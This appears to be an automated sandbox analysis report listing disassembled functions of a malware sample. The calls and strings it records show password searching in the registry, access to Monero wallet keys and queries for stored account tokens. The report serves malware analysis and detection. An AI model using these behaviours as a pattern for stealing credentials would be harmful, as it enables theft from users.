                  • API String ID: 3191641157-3653984579
                  • Opcode ID: dc41f08a493d9c3901bfc7a4c8abc3623c2127bf37f2c01ab92572630580285d
                  • Instruction ID: 9633c066a9539a1ee6f58104bbff1ac8a3cded1febfdc0e19446b9741836f994
                  • Opcode Fuzzy Hash: dc41f08a493d9c3901bfc7a4c8abc3623c2127bf37f2c01ab92572630580285d
                  • Instruction Fuzzy Hash: D1314BB9D40109DFCB08EBE5DC9ADFE7378EB49311B184128F102B7290DA34A94BDB51
                  Function 00C072D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00C07314
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C0733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C073B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C0740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00C07452
                  • HeapFree.KERNEL32(00000000), ref: 00C07459
                  • task.LIBCPMTD ref: 00C07555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: Password
                  • API String ID: 2808661185-3434357891
                  • Opcode ID: 4764e14e703d5993d576d643ced5fcec03409a7f6e5e4e13707248bd3e2a0950
                  • Instruction ID: ec53058d47f162181828f91010ea5069d5742d1f835cd1fb1fc2aa7f99d8a7d2
                  • Opcode Fuzzy Hash: 4764e14e703d5993d576d643ced5fcec03409a7f6e5e4e13707248bd3e2a0950
                  • Instruction Fuzzy Hash: AE613BB5C042689BDB24DB50CC45BDAB7B8BF48304F0081E9E689A6181DF706FC9DFA1
                  Function 00C18100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0179E5B8,00000000,?,00C20E2C,00000000,?,00000000), ref: 00C18130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C18137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00C18158
                  • __aulldiv.LIBCMT ref: 00C18172
                  • __aulldiv.LIBCMT ref: 00C18180
                  • wsprintfA.USER32 ref: 00C181AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: 123083de831672a0fe8ad7b6104cd067bacda335d66f8d8a03b1ebf55167a873
                  • Instruction ID: 17bc46e27d361c9b7768a2753e79a893174fb43e3aacf7570e76e0656d887d9d
                  • Opcode Fuzzy Hash: 123083de831672a0fe8ad7b6104cd067bacda335d66f8d8a03b1ebf55167a873
                  • Instruction Fuzzy Hash: 04214DB1E44218ABDB00DFD5CC49FAEB7B8FB45B10F204219F605BB280C77869059BA5
                  Function 00C060A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C04839
                    • Part of subcall function 00C047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C04849
                  • InternetOpenA.WININET(00C20DF7,00000001,00000000,00000000,00000000), ref: 00C0610F
                  • StrCmpCA.SHLWAPI(?,0179ED68), ref: 00C06147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00C0618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C061B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00C061DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C0620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00C06249
                  • InternetCloseHandle.WININET(?), ref: 00C06253
                  • InternetCloseHandle.WININET(00000000), ref: 00C06260
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: 8c3ec437fd7fc7cffafe072c4d79097a07da0be872e0c2bc870a695f36ab6a5b
                  • Instruction ID: ae918732bd8c7a5c93bed8bc0ab1145613dbc0e1091be7e31581e7abe9d0557d
                  • Opcode Fuzzy Hash: 8c3ec437fd7fc7cffafe072c4d79097a07da0be872e0c2bc870a695f36ab6a5b
                  • Instruction Fuzzy Hash: 885170B1940218AFEB20DF51DC49BEE77B8EB05701F1080A9B605B71C0DB74AB8ADF95
                  Function 00C0BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                  • lstrlen.KERNEL32(00000000), ref: 00C0BC9F
                    • Part of subcall function 00C18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C18E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00C0BCCD
                  • lstrlen.KERNEL32(00000000), ref: 00C0BDA5
                  • lstrlen.KERNEL32(00000000), ref: 00C0BDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 4d084711818c7970918d6e3f2996cba73829fc72b98648995422bdc78b8180ed
                  • Instruction ID: 10103cb62f0e0c43d6db231c837e1430934d105087352154a501841d281bdfe7
                  • Opcode Fuzzy Hash: 4d084711818c7970918d6e3f2996cba73829fc72b98648995422bdc78b8180ed
                  • Instruction Fuzzy Hash: B5B17F719111089BDB04FBA0DD96EEE7339AF55310F444168F506B21D1EF34AE8AFBA2
                  Function 00C16770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: aea36bbf646fea87de88538d9441171b9e7a9d9034b8fe80538b958d0bbb7e86
                  • Instruction ID: a2afc6755811872f602b113ef4d4c095a93b8197caf56895ed9810679baaf6e9
                  • Opcode Fuzzy Hash: aea36bbf646fea87de88538d9441171b9e7a9d9034b8fe80538b958d0bbb7e86
                  • Instruction Fuzzy Hash: 37F03A34984209EFE3549FE2E90D76C7BB0FB06712F0801AAF709A62D0D6704B42DB96
                  Function 00C04FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C04FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C04FD1
                  • InternetOpenA.WININET(00C20DDF,00000000,00000000,00000000,00000000), ref: 00C04FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00C05011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00C05041
                  • InternetCloseHandle.WININET(?), ref: 00C050B9
                  • InternetCloseHandle.WININET(?), ref: 00C050C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: bc30e2f25af20b0fa93e4d793a37b8ff4b87b10f8026f3e7efe45ff040a42f10
                  • Instruction ID: 3c353db78bffac3a201735eeb2fb171a3683442632b48b22f7208c16993cbec2
                  • Opcode Fuzzy Hash: bc30e2f25af20b0fa93e4d793a37b8ff4b87b10f8026f3e7efe45ff040a42f10
                  • Instruction Fuzzy Hash: D731F8B4A40218ABDB20CF55DC89BDDB7B4EB48704F1081E9E609B7281D7706AC6CF99
                  Function 00C183DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C18426
                  • wsprintfA.USER32 ref: 00C18459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C1847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00C1848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00C18499
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                  • RegQueryValueExA.ADVAPI32(00000000,0179E470,00000000,000F003F,?,00000400), ref: 00C184EC
                  • lstrlen.KERNEL32(?), ref: 00C18501
                  • RegQueryValueExA.ADVAPI32(00000000,0179E6A8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C20B34), ref: 00C18599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00C18608
                  • RegCloseKey.ADVAPI32(00000000), ref: 00C1861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: 09593343820c23add332cf18f4df0d542cbb9074e668681ca389a90998ea2b65
                  • Instruction ID: 097ae221ea3ae8029aeb36aa776cbcd3a6f66074075c3137e7579e22074c1fca
                  • Opcode Fuzzy Hash: 09593343820c23add332cf18f4df0d542cbb9074e668681ca389a90998ea2b65
                  • Instruction Fuzzy Hash: 72210A759402189FDB24DB54DC85FE9B3B8FB48710F04C1E9A609A6180DF71AA86CFD4
                  Function 00C17690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C176A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C176AB
                  • RegOpenKeyExA.ADVAPI32(80000002,0178C538,00000000,00020119,00000000), ref: 00C176DD
                  • RegQueryValueExA.ADVAPI32(00000000,0179E458,00000000,00000000,?,000000FF), ref: 00C176FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00C17708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: a368fa4ddb1c0ae134585b3ce4d68607ab09a80155098fc109064de91ee7e7d6
                  • Instruction ID: 5d1837e862b8d671380b5efd072af045c4bbefc311e05be2c6891d9b146694ad
                  • Opcode Fuzzy Hash: a368fa4ddb1c0ae134585b3ce4d68607ab09a80155098fc109064de91ee7e7d6
                  • Instruction Fuzzy Hash: 9C0184B9A40204BFEB10DBE1DC4DFAD77BCEB09710F144165FA04E7290D67099459B51
                  Function 00C17720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C17734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C1773B
                  • RegOpenKeyExA.ADVAPI32(80000002,0178C538,00000000,00020119,00C176B9), ref: 00C1775B
                  • RegQueryValueExA.ADVAPI32(00C176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00C1777A
                  • RegCloseKey.ADVAPI32(00C176B9), ref: 00C17784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: 2cd9ab0d7e9cbf1fae171ff2d1fe3223bca6396a9173de5f0ad40ae8d15c1a75
                  • Instruction ID: f71fa32e7fe2704683808868847c2a18a4d24462fa6aa768d69ca7c6df283732
                  • Opcode Fuzzy Hash: 2cd9ab0d7e9cbf1fae171ff2d1fe3223bca6396a9173de5f0ad40ae8d15c1a75
                  • Instruction Fuzzy Hash: 730144B9A40308BFE710DBE1DC4AFAEB7B8EB49710F104165FA05A7281D67056459F51
                  Function 00C140B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00C140D5
                  • RegOpenKeyExA.ADVAPI32(80000001,0179DC00,00000000,00020119,?), ref: 00C140F4
                  • RegQueryValueExA.ADVAPI32(?,0179EB58,00000000,00000000,00000000,000000FF), ref: 00C14118
                  • RegCloseKey.ADVAPI32(?), ref: 00C14122
                  • lstrcat.KERNEL32(?,00000000), ref: 00C14147
                  • lstrcat.KERNEL32(?,0179EB28), ref: 00C1415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
